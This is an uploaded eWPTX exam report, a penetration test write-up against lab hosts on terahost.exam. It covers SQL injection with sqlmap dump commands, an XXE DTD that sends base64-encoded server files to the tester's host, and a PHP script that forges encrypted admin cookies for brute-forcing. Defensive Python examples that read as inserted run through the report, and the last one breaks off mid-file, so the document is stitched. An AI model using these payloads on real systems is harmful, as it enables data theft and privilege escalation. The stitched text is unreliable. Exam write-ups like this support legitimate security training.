The eWPTX Exam Report details a penetration test conducted by Tera Host and TU EMPRESA to assess the security of their web applications. The report outlines the testing methodology, including planning, discovery, attack, and reporting stages, and highlights vulnerabilities such as SQL injection found during the assessment. Recommendations for improving security measures, including the use of parameterized queries to prevent SQL injection, are also provided.

Uploaded by maddev815

eWPTX Exam Report

Confidentiality Statement

This document is the sole property of Tera Host and TU EMPRESA. It contains sensitive and
proprietary information. Any duplication, redistribution, or utilization of this document, whether in
whole or in part, in any manner, necessitates the approval of both Tera Host and TU EMPRESA.
To demonstrate compliance with penetration test requirements, Tera Host may disclose this
document to auditors under non-disclosure agreements.

Disclaimer

A penetration test represents a specific point in time. The conclusions and suggestions stem from
the data collected during the evaluation and do not account for alterations or adjustments made
outside of that timeframe. Time-constrained engagements do not permit a comprehensive review
of all security measures. TU EMPRESA focused the assessment on detecting the most vulnerable
security controls that an attacker could exploit. To maintain the effectiveness of these controls, TU
EMPRESA advises conducting similar evaluations on an annual basis, either internally or through
third-party assessors.

Assessment Overview

Tera Host collaborated with TU EMPRESA to analyze its infrastructure's security stance against
current industry best practices, encompassing a web application penetration test. The testing
conducted is based on the NIST SP 800-115 Technical Guide to Information Security Testing and
Assessment, OWASP Testing Guide (v4), and tailored testing frameworks.

The penetration testing process consists of the following stages:

1. Planning – Collect customer objectives and establish rules of engagement.

2. Discovery – Conduct scanning and enumeration to pinpoint potential vulnerabilities, weak
spots, and exploitable areas.

3. Attack – Validate potential vulnerabilities through exploitation and carry out further discovery
with new access.

4. Reporting – Document all identified vulnerabilities and exploits, unsuccessful attempts, and
the organization's strengths and weaknesses.

eWPTX Exam Report 1


Assessment Components

Web Application Penetration Test

To determine the security of a system, web application penetration testing simulates attacks on
the system with the goal of obtaining sensitive information. These attacks can be executed either
internally or externally and help gather data about the target system while revealing its
vulnerabilities and possible exploits. This essential system health check informs testers if security
measures and corrective actions need to be implemented.

I will keep in mind that I can't do the following on my targets:

-Denial of Service (DoS)

-Phishing/Social Engineering

All other attacks not specified above were permitted by Tera Host.

Scope :

10.100.13.37
10.100.13.33
10.100.13.34

All of these are for the terahost.com domain.

To connect to the target organization's website and also resolve domain names, I have to add
the server IP address 10.100.13.37 to my DNS configuration in the same way I did with the
course laboratories, and add an entry to the /etc/resolv.conf file with the IP address of the
server.

Now, the scope is :

1. 10.100.13.37 = http://www.terahost.exam

2. 10.100.13.33 = http://me.terahost.exam/

3. 10.100.13.34 = http://blog.terahost.exam/ alias “FOOCORP BLOG”

I will add this to /etc/hosts:

Also I will restart the network services to be sure everything goes as planned.

Starting the pentesting on the 3 targets, I got:

www.terahost.exam

First of all, installing the FoxyProxy plugin in Kali's Firefox:

Configuring the add-on so it connects to Burpsuite.

And in FoxyProxy I do:

Now every time I check Burpsuite in the add-on, traffic will be redirected to my Burpsuite.

Also I will install the Burpsuite CA certificate by going to http://burpsuite, downloading and installing it.

I will use Burp's browser from now on, so I need to check "Run Burp's browser without a
sandbox":

Now I am good to go and check the website more.

After navigating on it, I will get the HTTP History and see more about the target:

After doing some more checks, my attention went to this newsletter subscription:

I have sent this page to Repeater to see whether a single-quote or double-quote error is present:

Single quote (got me an error):

Double quotes, not:

So definitely it's an SQL injection here, and the single quote is the trigger.

Using https://portswigger.net/web-security/sql-injection and the cheatsheet from there, I got the
injection. After using some payloads from the cheatsheet on that third-party website, I managed to see
that I am able to execute SQL queries that spit out the correct information about the SQL database:

In the above I asked for the version using the following payload in the username field:
test',version())#

Searching more, I found that the domain search can be injected too.
Checking HTTP History in Burpsuite:

In Burpsuite I got:

I will save the request in a file called tera.sql; here is the content:

POST /check HTTP/1.1
Host: www.terahost.exam
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 17
Origin: http://www.terahost.exam
Connection: close
Referer: http://www.terahost.exam/

domain=*.test

After running sqlmap with the tera.sql file using the following command, I realised it has
vulnerabilities too, and found it's a time-based blind SQL injection:

sqlmap -r tera.sql

I will explain, as the PortSwigger website explains it, what happens here:
SQL injection (SQLi) is a web security vulnerability that allows an attacker to interfere with the
queries that an application makes to its database. It generally allows an attacker to view data that
they are not normally able to retrieve. This might include data belonging to other users, or any
other data that the application itself is able to access. In many cases, an attacker can modify or
delete this data, causing persistent changes to the application's content or behavior.

In some situations, an attacker can escalate a SQL injection attack to compromise the underlying
server or other back-end infrastructure, or perform a denial-of-service attack.

What is the impact of a successful SQL injection attack?

A successful SQL injection attack can result in unauthorized access to sensitive data, such as
passwords, credit card details, or personal user information. Many high-profile data breaches in
recent years have been the result of SQL injection attacks, leading to
reputational damage and regulatory fines. In some cases, an attacker can obtain a persistent
backdoor into an organization's systems, leading to a long-term compromise that can go
unnoticed for an extended period.

How to prevent SQL injection

Most instances of SQL injection can be prevented by using parameterized queries (also known as
prepared statements) instead of string concatenation within the query.
Parameterized queries can be used for any situation where untrusted input appears as data within
the query, including the WHERE clause and values in an INSERT or UPDATE
statement. They can't be used to handle untrusted input in other parts of the query, such as table
or column names, or the ORDER BY clause. Application functionality that places untrusted data into
those parts of the query will need to take a different approach, such as
white-listing permitted input values, or using different logic to deliver the required behavior.

For a parameterized query to be effective in preventing SQL injection, the string that is used in the
query must always be a hard-coded constant, and must never contain any variable data from any
origin. Do not be tempted to decide case-by-case whether an item of data is trusted, and continue
using string concatenation within the query for cases that are considered safe. It is all too easy to
make mistakes about the possible origin of data, or for changes in other code to violate
assumptions about what data is tainted.

me.terahost.exam

Going straight to http://10.100.13.37 landed me on a login page; I also clicked Register to
register an account (all this is done in the Burpsuite browser):

I used exam in all the fields and test as the password, then clicked Register.

After doing that, it redirected me to the Login page.


Using the creds I registered, it just tells me welcome back exam, then exits and gives me back the
login page, asking me to log in again.
I couldn't catch a screenshot, because the refresh rate is too fast for me to take one.

But as always, I can check HTTP History in Burp:

The above shows the message I couldn't catch fast enough with the screenshot.

After checking more, I saw this:

Following my first approach of SQL injection from the terahost.exam target earlier, it's a single
quote here, so let's try on the name again with the single quote and see what I can get.
First I send this to Repeater and then repeat the test to see if it's vulnerable:

And it seems it is:

So the payload here is name=exam'

Also notice in the above screenshot that the password I used, test, is changed to MD5, which is a
weak approach from the ones who created this register page for terahost.exam.
test in MD5 = 098f6bcd4621d373cade4e832627b4f6
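The hash above is what an unsalted MD5 of a short password looks like, and it is why the report calls it a weak approach: it is fast to compute and identical for every user who picks the same password. As an added example, not code from the report or from Tera Host's register page, this Python snippet reproduces that MD5 value and puts beside it the scheme a defender would deploy instead: a random per-user salt, a slow key-derivation function (PBKDF2-HMAC-SHA256 from the standard library) and a constant-time comparison. The iteration count and all function names are my own choices.

```python
import hashlib
import hmac
import os

# Iteration count is an assumption for this example (a current OWASP-style value).
PBKDF2_ITERATIONS = 600_000


def md5_hex(password: str) -> str:
    """Legacy scheme seen on the register page: unsalted, fast, same value per user."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def hash_password(password: str, salt=None) -> str:
    """Salted PBKDF2-HMAC-SHA256; returns a self-describing string for storage."""
    if salt is None:
        salt = os.urandom(16)  # fresh random salt for every stored password
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count, compare in constant time."""
    try:
        algo, iterations, salt_hex, dk_hex = stored.split("$")
    except ValueError:  # not in the expected four-field format
        return False
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(dk, bytes.fromhex(dk_hex))


def same_password_hashes_differently(password: str) -> bool:
    """Two users with the same password get different stored values (unlike MD5)."""
    return hash_password(password) != hash_password(password)


if __name__ == "__main__":
    print("md5('test') =", md5_hex("test"))
    stored = hash_password("test")
    print("stored      =", stored)
    print("verify      =", verify_password("test", stored))
```

The stored string carries the algorithm, iteration count and salt, so the count can be raised later and old records re-hashed on next login without any change to the verifier.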
Now I will try to inject and see if I can get once again the version running, by injecting in the
surname:

In the webpage profile after login, I can see the following result:

Searching for more, it appears that I have discovered a potential SQL injection vulnerability while
testing the "update user" functionality. By inserting a single quote (') into each field and observing
a SQL error in the Repeater response after filling the city field with a single quote, it indicates that
the application may not be properly sanitizing user inputs.
So injection could be done this way too.
Now checking the Profile page after logging in, I played in Burp and noticed that after adding a single
quote to the "city" field next to Berlin (this was added by the app itself), I got the following error in
Repeater:

It can be seen that after updating the user with that value I got an error again. And errors are good
in SQL testing; they help identify potential breaches!
Knowing this, I will craft an sqlmap command once again and test whether it's vulnerable:

sqlmap --csrf-url=http://me.terahost.exam/profile --csrf-token="acdt67gshfuiuasfsg" -u http://me.terahost.exam/update-user --data="name=exam&surname=exam&email=exam%40exam.com&street_address=8850+Egestas+Ave&city=Berlin&zip=29977-647&iban=GT33211377800379210569053628&password=&uID=500&acdt67gshfuiuasfsg=ef0d17b3bdb4ee2aa741ba28" -p 'city' --cookie="_sid_=bv6ppamplr520ek47a03dk00u7; displayoptions=1" --random-agent --current-db --users --is-dba --privileges

Seems good so far; now trying to dump the users:

sqlmap --csrf-url=http://me.terahost.exam/profile --csrf-token="acdt67gshfuiuasfsg" -u http://me.terahost.exam/update-user --data="name=exam&surname=exam&email=exam%40exam.com&street_address=8850+Egestas+Ave&city=Berlin&zip=29977-647&iban=GT33211377800379210569053628&password=&uID=500&acdt67gshfuiuasfsg=ef0d17b3bdb4ee2aa741ba28" -p 'city' --cookie="_sid_=bv6ppamplr520ek47a03dk00u7; displayoptions=1" --random-agent --current-db --users --dump

The dump for users was huge, but I proved it works, so all good.

Once again for patching I will say what I have read from the https://portswigger.com website:
Most instances of SQL injection can be prevented by using parameterized queries (also
known as prepared statements) instead of string concatenation within the query.
Parameterized queries can be used for any situation where untrusted input appears as data
within the query, including the WHERE clause and values in an INSERT or UPDATE statement.
They can't be used to handle untrusted input in other parts of the query, such as table or
column names, or the ORDER BY clause. Application functionality that places untrusted data
into those parts of the query will need to take a different approach, such as white-listing
permitted input values, or using different logic to deliver the required behavior.
For a parameterized query to be effective in preventing SQL injection, the string that is used
in the query must always be a hard-coded constant, and must never contain any variable data
from any origin. Do not be tempted to decide case-by-case whether an item of data is
trusted, and continue using string concatenation within the query for cases that are
considered safe. It is all too easy to make mistakes about the possible origin of data, or for
changes in other code to violate assumptions about what data is tainted.
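To make the advice concrete for the newsletter form on www.terahost.exam and the update-user form on me.terahost.exam, here is an added example (my code, not the report's and not Tera Host's) in Python with the standard-library sqlite3 module standing in for the target's database. The concatenating version breaks on a single quote the same way the report observed in Repeater, the parameterized version stores the quote as data, and the sort column, which cannot be bound as a parameter, is checked against an allowlist as the PortSwigger text recommends. The table, column names and sample rows are constructed for the example.

```python
import sqlite3

# Constructed schema standing in for the newsletter/profile tables of the report.
SCHEMA = """
CREATE TABLE subscribers (
    id       INTEGER PRIMARY KEY,
    username TEXT NOT NULL,
    email    TEXT NOT NULL
)
"""

# ORDER BY cannot take a bound parameter, so an untrusted sort key goes through an allowlist.
ALLOWED_SORT_COLUMNS = {"username", "email"}


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    return conn


def subscribe_unsafe(conn, username: str, email: str) -> None:
    """Vulnerable: user input is spliced into the SQL text (the pattern behind the finding)."""
    sql = f"INSERT INTO subscribers (username, email) VALUES ('{username}', '{email}')"
    conn.execute(sql)


def subscribe_safe(conn, username: str, email: str) -> None:
    """Fixed: the SQL text is a hard-coded constant; values travel separately as parameters."""
    conn.execute(
        "INSERT INTO subscribers (username, email) VALUES (?, ?)",
        (username, email),
    )


def list_usernames(conn, order_by: str = "username") -> list:
    """The sort key is query structure, not data, so it is validated, not bound."""
    if order_by not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"sort column not permitted: {order_by!r}")
    rows = conn.execute(f"SELECT username FROM subscribers ORDER BY {order_by}").fetchall()
    return [row[0] for row in rows]


def demo() -> tuple:
    """Returns (unsafe path raised a SQL error, usernames stored via the safe path)."""
    conn = make_db()
    probe = "test'"  # the single-quote probe the report used
    unsafe_error = False
    try:
        subscribe_unsafe(conn, probe, "probe@example.test")
    except sqlite3.OperationalError:
        # Unterminated string literal: the same class of error the report saw in Repeater.
        unsafe_error = True
    subscribe_safe(conn, probe, "probe@example.test")
    return unsafe_error, list_usernames(conn)


if __name__ == "__main__":
    print(demo())
```

The safe path never inspects the value for quotes at all; that is the point of the PortSwigger paragraph above about not deciding case by case which inputs are trusted.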

Now let's look deeper.

I used dirb and checked for more undisclosed paths:

dirb http://me.terahost.exam/

This showed me the http://me.terahost.exam/support page. I put a message there, test, and sent it.

Checking more in HTTP History, sending to Repeater.


I crafted a DTD file to be fetched from my Kali VM and called it data.dtd.
It has the following content:

<!ENTITY % out SYSTEM "php://filter/read=convert.base64-encode/resource=file:///var/www/me.terahost.exam/info.php">
<!ENTITY % intern "<!ENTITY &#37; xxe SYSTEM 'http://10.100.13.200:1234/x=?%out;'> ">

Now hosting the file with a Python server:

python3 -m http.server 80

Now I edit the request to fetch the data.dtd file from my Kali VM and then execute it, and saw
all went well!

Watching again the video from the INE training about XXE.


Downloading xxeserve:

git clone https://github.com/joernchen/xxeserve.git

Configuring the xxeserve.rb file with my server:

Giving execute rights on xxeserve.rb:

chmod +x xxeserve.rb

gem install sinatra

Had to install it so it can work.

Started xxeserve.rb:

./xxeserve.rb 80

Now I will create, as in the video but with a slight modification, evil.dtd and host it with apache2 on
/var/www/html.
Also tested to see if it's hosted; here is the content too:

Hosting with the Python3 http server:

python3 -m http.server 80

Got the string encoded in base64:

PD9waHAgJF9bXSsrOyRfW109JF8uXzskX19fX189JF9bKCsrJF9fW10pXVsoKyskX19bXSkrKCsrJF9fW10pKygrKyRfX1tdKV07
JF89JF9bJF9bK19dXTskX19fPSRfXz0kX1srKyRfX1tdXTskX19fXz0kXz0kX1srX107JF8rKzskXysrOyRfKys7JF89JF9fX18u
KyskX19fLiRfX18uKyskXy4kX18uKyskX19fOyRfXz0kXzskXz0kX19fX187JF8rKzskXysrOyRfKys7JF8rKzskXysrOyRfKys7
JF8rKzskXysrOyRfKys7JF8rKzskX19fPStfOyRfX18uPSRfXzskX19fPSsrJF9eJF9fX1srX107JMOAPStfOyTDgT0kw4I9JMOD
PSTDhD0kw4Y9JMOIPSTDiT0kw4o9JMOLPSsrJMOBW107JMOCKys7JMODKys7JMODKys7JMOEKys7JMOEKys7JMOEKys7JMOGKys7
JMOGKys7JMOGKys7JMOGKys7JMOIKys7JMOIKys7JMOIKys7JMOIKys7JMOIKys7JMOJKys7JMOJKys7JMOJKys7JMOJKys7JMOJ
Kys7JMOJKys7JMOKKys7JMOKKys7JMOKKys7JMOKKys7JMOKKys7JMOKKys7JMOKKys7JMOLKys7JMOLKys7JMOLKys7JMOLKys7
JMOLKys7JMOLKys7JMOLKys7JF9fKCckXz0iJy4kX19fLiTDgS4kw4QuJMOGLiRfX18uJMOBLiTDhC4kw4MuJF9fXy4kw4EuJMOG
LiTDgC4kX19fLiTDgS4kw4YuJMOJLiRfX18uJMOELiTDgC4kX19fLiTDhC4kw4IuJF9fXy4kw4EuJMOBLiTDgC4kX19fLiTDgS4k
w4QuJMOGLiRfX18uJMOBLiTDhi4kw4QuJF9fXy4kw4EuJMOGLiTDhC4kX19fLiTDgS4kw4YuJMOJLiRfX18uJMOELiTDgC4kX19f
LiTDgS4kw4guJMOELiRfX18uJMOBLiTDhi4kw4AuJF9fXy4kw4EuJMOELiTDhi4kX19fLiTDgS4kw4guJMOCLiRfX18uJMOBLiTD
hC4kw4YuJF9fXy4kw4YuJMOELiRfX18uJMOELiTDgC4kX19fLiTDgS4kw4EuJMOBLiRfX18uJMOELiTDgC4kX19fLiTDgS4kw4Qu
JMODLiRfX18uJMOBLiTDhC4kw4EuJF9fXy4kw4EuJMOGLiTDiC4kX19fLiTDhC4kw4AuJF9fXy4kw4EuJMOILiTDgi4kX19fLiTD
gS4kw4QuJMOGLiRfX18uJMOBLiTDhC4kw4EuJF9fXy4kw4EuJMOELiTDhC4kX19fLiTDhC4kw4AuJF9fXy4kw4EuJMOCLiTDgC4k
X19fLiTDgS4kw4EuJMOALiRfX18uJMOBLiTDgi4kw4AuJF9fXy4kw4QuJMOALiRfX18uJMOBLiTDhC4kw4YuJF9fXy4kw4EuJMOI
LiTDiC4kX19fLiTDgS4kw4QuJMOGLiRfX18uJMOBLiTDhi4kw4guJF9fXy4kw4QuJMOALiRfX18uJMOBLiTDhC4kw4YuJF9fXy4k
w4EuJMOGLiTDiC4kX19fLiTDgS4kw4QuJMODLiRfX18uJMOBLiTDhi4kw4kuJF9fXy4kw4EuJMOELiTDhC4kX19fLiTDgS4kw4Qu
JMOGLiRfX18uJMOBLiTDhC4kw4QuJF9fXy4kw4YuJMOELiRfX18uJMOELiTDgC4kX19fLiTDgS4kw4EuJMOBLiRfX18uJMOELiTD
gC4kX19fLiTDgS4kw4QuJMODLiRfX18uJMOBLiTDhC4kw4EuJF9fXy4kw4EuJMOGLiTDiC4kX19fLiTDhC4kw4AuJF9fXy4kw4Eu
JMOILiTDgC4kX19fLiTDgS4kw4QuJMOBLiRfX18uJMOBLiTDiC4kw4MuJF9fXy4kw4EuJMOILiTDgy4kX19fLiTDhC4kw4AuJF9f
Xy4kw4EuJMOILiTDhC4kX19fLiTDgS4kw4YuJMOALiRfX18uJMOBLiTDhC4kw4YuJF9fXy4kw4QuJMOALiRfX18uJMOBLiTDhC4k
w4YuJF9fXy4kw4EuJMOJLiTDgC4kX19fLiTDgS4kw4QuJMOBLiRfX18uJMOBLiTDhi4kw4YuJF9fXy4kw4QuJMOBLiRfX18uJMOE
LiTDgi4kX19fLiTDiS4kw4MuJyInKTskX18oJF8pOz8+Cg==

I see it's obfuscated PHP, so I managed to get it finally.

Going to 3v4l.org, selecting all the PHP versions and decoding, I got the flag:

Full link → https://3v4l.org/CDeJE#v7.0.33

echo "Hello there, I can read PHP even encoded, I can pass the exam!"; in /in/CDeJE on line 1
Just zoom in on the picture, and it will show the above flag!

That's the XXE vulnerability found on me.terahost.exam/support.

According to https://portswigger.net/web-security/xxe, XXE injection is a serious vulnerability that
allows attackers to access files and directories outside the XML document. With arbitrary access
to the file system, an attacker can access configuration data, passwords, log files, source code,
intellectual property, or system files. Besides the disclosure of sensitive data, this attack may lead
to a denial of service, enable malicious code execution, or allow the attacker to conduct a port scan
from the perspective of the machine where the parser is located.
XML external entity injection (also known as XXE) is a web security vulnerability that allows an
attacker to interfere with an application's processing of XML data. It often allows an attacker to
view files on the application server file system, and to interact with any back-end or external
systems that the application itself can access. In some situations, an attacker can escalate an
XXE attack to compromise the underlying server or other back-end infrastructure, by leveraging
the XXE vulnerability to perform server-side request forgery (SSRF) attacks.
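The /support finding worked because the parser accepted a DOCTYPE and fetched the external DTD it pointed at. The fix on the defender's side is to refuse any DTD before an entity is ever declared. Here is an added example (mine, not the report's and not Tera Host's code) in Python using only the standard library: a pre-parse with pyexpat that fails closed on the first DOCTYPE declaration and disables external parameter entity parsing, followed by a normal ElementTree parse that reads only the two fields the form defines. The XML samples, element names and host name are constructed for the example.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat as expat

# Constructed inputs, not captured from the /support endpoint.
BENIGN_XML = b"""<?xml version="1.0"?>
<support><name>exam</name><message>test</message></support>"""

# Same shape the report used: an external parameter entity pulled from a remote DTD.
EXTERNAL_DTD_XML = b"""<?xml version="1.0"?>
<!DOCTYPE support [ <!ENTITY % remote SYSTEM "http://dtd-host.example/data.dtd"> %remote; ]>
<support><name>exam</name><message>&xxe;</message></support>"""


class DtdRejected(ValueError):
    """Raised when a document carries any DTD; the support form never needs one."""


def reject_dtd(xml_bytes: bytes) -> None:
    """Fail closed at the DOCTYPE, before any entity is declared, let alone fetched."""
    parser = expat.ParserCreate()
    # Belt and braces: never read external parameter entities even if a DOCTYPE got through.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdRejected(
            f"DOCTYPE for <{name}> refused (system id={sysid!r}, "
            f"internal subset={bool(has_internal_subset)})"
        )

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml_bytes, True)  # an exception in the handler propagates out of Parse()


def parse_support_message(xml_bytes: bytes) -> dict:
    """Gate on the DTD first, then read only the fields the form defines."""
    reject_dtd(xml_bytes)
    root = ET.fromstring(xml_bytes)
    if root.tag != "support":
        raise ValueError(f"unexpected root element {root.tag!r}")
    return {
        "name": (root.findtext("name") or "").strip(),
        "message": (root.findtext("message") or "").strip(),
    }


def is_rejected(xml_bytes: bytes) -> bool:
    """True when the DTD gate refuses the document (used by the checks below)."""
    try:
        parse_support_message(xml_bytes)
    except DtdRejected:
        return True
    return False


if __name__ == "__main__":
    print(parse_support_message(BENIGN_XML))
    print("external DTD rejected:", is_rejected(EXTERNAL_DTD_XML))
```

A rejected DOCTYPE is also a cheap detection signal: a support form should never receive one, so logging the refusal with the source address flags probing of exactly the kind the report describes.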

blog.terahost.exam
Point of reference here is the same website, PortSwigger; here is the full link:
https://portswigger.net/web-security/deserialization

Insecure deserialization is when user-controllable data is deserialized by a website. This
potentially enables an attacker to manipulate serialized objects in order to pass harmful data into
the application code.
It is even possible to replace a serialized object with an object of an entirely different class.
Alarmingly, objects of any class that is available to the website will be deserialized and
instantiated, regardless of which class was expected. For this reason, insecure deserialization is
sometimes known as an "object injection" vulnerability.
An object of an unexpected class might cause an exception. By this time, however, the damage
may already be done. Many deserialization-based attacks are completed before deserialization is
finished. This means that the deserialization process itself can initiate an attack, even if the
website's own functionality does not directly interact with the malicious object. For this reason,
websites whose logic is based on strongly typed

The impact of insecure deserialization can be very severe because it provides an entry point to a
massively increased attack surface. It allows an attacker to reuse existing application code in
harmful ways, resulting in numerous other vulnerabilities, often remote code execution.

Even in cases where remote code execution is not possible, insecure deserialization can lead to
privilege escalation, arbitrary file access, and denial-of-service attacks.

Used feroxbuster:

feroxbuster --url http://blog.terahost.exam/

Used dirsearch too on this one:

dirsearch --url http://blog.terahost.exam/

Found a login.php page.

From dirsearch I also found this in the GIT logs on testtest1234567890:

I will take note of this for later.

Another interesting finding is:

This seems promising.

Using https://lelinhtinh.github.io/de4js/, I put in the content of blog.js and clicked Auto Decode.

Got this output!

var http = new XMLHttpRequest,
url = '[',
params = String['"'](117, 115, 101, 114, 110, 97, 109, 101),
p1 = String['"'](61, 102, 111, 111, 98, 108, 111),
pp11 = String['"'](103, 38, 112, 97, 115),
p11 = String['"'](103, 38, 112, 97, 115),
p2 = String['"'](115, 119, 111, 114, 100, 61, 102, 111),
p111 = String['"'](103, 38, 112, 97, 115),
p22 = String['"'](111, 48, 98, 108, 111, 103, 49),
x = '\\';
xx = params.x(p1), xxx = xx.x(p11), yyy = yyy.x(xxx), xxxx = xxx.x(p2), yy = xxxx.x(p22), http.F('3', url, !0), http['7']('\\', 'x'), alert(yyy), http['0'] = function () {
4 == http['\\'] && 200 == http.x && alert(http['6']), console['1'](p2)
}, http['\\'](yy)

Nothing yet; trying another website I found by googling, https://mindedsecurity.github.io/jstillery/

Found creds!

Line 33 →

http.send('username=fooblog&password=foo0blog1');

Username : fooblog
Password : foo0blog1

All content deobfuscated:

var _0x4777 = [
'?page=login',
'fromCharCode',
'',
'concat',
'POST',
'open',
'Content-type',
'application/x-www-form-urlencoded',
'setRequestHeader',
'onreadystatechange',
'readyState',
'status',
'responseText',
'log',
'send'
];
var http = new XMLHttpRequest(), url = '?page=login', params = 'username', p1 = '=fooblo', pp11 = 'g&pas', p11 = 'g&pas', p2 = 'sword=fo', p111 = 'g&pas', p22 = 'o0blog1', x = '';
xx = 'username=fooblo';
xxx = 'username=fooblog&pas';
yyy = yyy.concat('username=fooblog&pas');
xxxx = 'username=fooblog&password=fo';
yy = 'username=fooblog&password=foo0blog1';
http.open('POST', '?page=login', true);
http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
alert(yyy.concat('username=fooblog&pas'));
http.onreadystatechange = function ()
/* Called:undefined | Scope Closed:false| writes:false*/
{
4 == http.readyState && 200 == http.status && alert(http.responseText);
console.log(p2);
};
http.send('username=fooblog&password=foo0blog1');

Successfully logged in to the blog.

From the GIT logs that I've shown above, I found testtest1234567890; trying it with the blog, I
got something new!

Link : http://blog.terahost.exam/testtest1234567890/

Checking the content of the files further:

cryp.php.inc:

<?

$plaintext = "abcdef";
$key = "8b362e210615e66b3bf7f69f6c819056";
$cipher = "aes-256-ctr";
$iv = "ABCDEFGHIJKLMNOP";

function encrypt($plaintext) {
    if (in_array($cipher, openssl_get_cipher_methods()))
    {
        $ivlen = openssl_cipher_iv_length($cipher);
        echo '\n'.strlen($iv).'\n';
        $ciphertext = openssl_encrypt($plaintext, $cipher, $key, $options=0, $iv);
        if ($ciphertext) {
            return $ciphertext;
        } else {
            echo "Encryption error";
        }
    }
}

userdata.php.inc:

<?php

class userdata {
public $role = "";
public $id = 0; //0-99
public $uid = 0; //0-99

}
?>

I had to press CTRL+U to see the code of each of the 2 pages.

I see in the last one that I can assign roles, so I will try to see if I can do PE (privilege escalation) on the target.
I will assign the role of Administrator.

So I will create a new PHP page with the following content and call it admin.php:

<?php

class userdata {
    public $role = "admin";
    public $id = 0;
    public $uid = 0;

    public function __construct($i, $u) {
        $this->id = (int)$i;
        $this->uid = (int)$u;
    }
}

$key = '8b362e210615e66b3bf7f69f6c819056';

for ($i = 0; $i < 100; $i++) {
    for ($x = 0; $x < 101; $x++) {
        $injected_class = new userdata($i, $x);
        $serialized_class = serialize($injected_class);

        $cipher = 'aes-256-ctr';
        $iv = "ABCDEFGHIJKLMNOP";

        $encrypted_data = openssl_encrypt($serialized_class, $cipher, $key, 0, $iv);

        $cookie_value = base64_encode($encrypted_data);
        echo("$cookie_value\n");
    }
}
?>

This admin.php creates a userdata class with public properties role , id , and uid . The
constructor of the class takes two parameters, $i and $u , and assigns their integer values to the
properties id and uid , respectively.

The script then uses two nested for loops to iterate through all combinations of $i and $x from
0 to 99 and 0 to 100, respectively. For each combination, it creates an instance of the userdata
class, serializes it, and then encrypts the serialized data using the openssl_encrypt() function. The
encrypted data is then base64-encoded and printed out.

After this, on my own Kali VM, I will execute the admin.php script using the PHP command-line
interface (CLI), and then redirect the output to a file called admin.txt.

The php CLI and the output in admin.txt:

I installed the Cookie Editor add-on on my Firefox.

Now I will use the admin.txt file with Burpsuite Intruder, trying the values I got in admin.txt
and looking for a good result (the longest response; then I change the auth value using the
Cookie Editor add-on).

First, in the Chrome browser from Burp, I log in to the blog, then I send the request to Intruder
and use admin.txt.

Now adding the list I just created previously to do the brute-force attack.

After starting the attack I got the role of admin in the response:

False alarm; it seems the account is locked, so I need to wait a lot for the Intruder task to finish
its 10100 tries.

Finally got a big length response:

Trying to edit the cookie and checking in the Firefox browser:

Ti8ra1RvUVBHd25HV3hydGFpZW1OQlExeFo0dW5zNnlVa1dSV244NmI4K1J1ZThkdmZHaUVWNy9ENnZHYzlFelpQMlpRUjRBSDFDamRyVXMwWS95Sm9mWk9RNmdKTE09

That is the cookie that works and makes me Administrator on the blog!

Perfect until here.

GET /index.php?page=profile HTTP/1.1
Host: blog.terahost.exam
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://blog.terahost.exam/login.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=fimsllqs80e7fqrqph976et5h1; auth=Ti8ra1RvUVBHd25HV3hydGFpZW1OQlExeFo0dW5zNnlVa1dSV244NmI4K1J1ZThkdmZHaUVWNy9ENnZHYzlFelpQMlpRUjRBSDFDamRyVXMwWS95Sm9mWk9RNmdKTE09
Connection: close

In general, it's best to avoid deserializing user input unless it's absolutely necessary, as the risks
associated with potential exploits and the challenges in defending against them often outweigh the
benefits. If you must deserialize data from untrusted sources, implement strong safeguards to
ensure data integrity, such as using a digital signature. Keep in mind that these checks should be
performed prior to starting the deserialization process; otherwise, they may not be effective.

If possible, steer clear of generic deserialization functions. These methods expose all attributes of
the original object, including private fields that may contain sensitive data. Instead, consider
developing custom, class-specific serialization methods that grant you control over which fields
are revealed.
Lastly, it's crucial to understand that the vulnerability lies in the deserialization of user input, not in
the gadget chains handling the data afterward. Don't depend on eliminating gadget chains
discovered during testing, as it's nearly impossible to address all of them due to the
interconnected web of cross-library dependencies present on your website. Furthermore, publicly
documented memory corruption exploits can pose a threat at any time, potentially leaving your
application vulnerable.
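The blog's auth cookie is an encrypted serialized userdata object with no integrity check, which is why trying the 10100 candidate values above was possible at all and why the role could be supplied by the client. This added example (mine, not the report's and not Tera Host's code) shows the pattern the two deserialization passages above ask for, in Python with the standard library: the cookie holds plain JSON with only the user id, an HMAC-SHA256 tag is verified before anything is decoded, no class is ever instantiated from client data, and the role comes from a server-side lookup. The user table, key and function names are constructed for the example.

```python
import base64
import hashlib
import hmac
import json
import secrets

# Constructed server-side state: the role is looked up here, never read from the cookie.
USER_ROLES = {500: "user", 1: "admin"}

# Per-deployment secret; generated fresh here so the example runs stand-alone.
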